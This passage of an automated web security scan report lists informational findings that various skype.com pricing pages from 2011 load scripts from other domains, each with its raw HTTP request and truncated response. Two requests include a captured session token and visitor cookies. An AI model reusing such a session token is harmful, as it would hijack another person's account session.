...[SNIP]...

18.790. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vanuatu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-vanuatu

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-vanuatu HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.791. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.792. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-venezuela  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-venezuela

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-venezuela HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.793. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vietnam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-vietnam

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-vietnam HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.794. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.795. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-yemen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-yemen

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-yemen HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.796. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zambia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-zambia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-zambia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.797. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.798. http://www.skype.com/intl/en-us/prices/pay-monthly  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/pay-monthly

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/pay-monthly HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 85433


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >

<head>
   
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.799. http://www.skype.com/intl/en-us/prices/pay-monthly/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/pay-monthly/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/pay-monthly/?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:27:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 85433
Content-Type: text/html; charset=utf-8
Content-Language: en


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >

<head>
   
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.800. http://www.skype.com/intl/en-us/prices/payg-rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/payg-rates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/payg-rates HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:14 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 220969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.801. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/payg-rates-special-offer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/payg-rates-special-offer/?cm_mmc=ICDC|0928_B1-_-Credit-generic-1407 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.skype.com
Cookie: VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:27:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 226014
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script><script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.802. http://www.skype.com/intl/en-us/prices/payg-rates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/payg-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/payg-rates/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 220969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.803. http://www.skype.com/intl/en-us/prices/payg-rates/connection-fees/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/payg-rates/connection-fees/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/payg-rates/connection-fees/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<hea
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/pricelists.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.804. http://www.skype.com/intl/en-us/prices/premium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/premium

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/premium HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.805. http://www.skype.com/intl/en-us/prices/premium/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/premium/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/premium/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
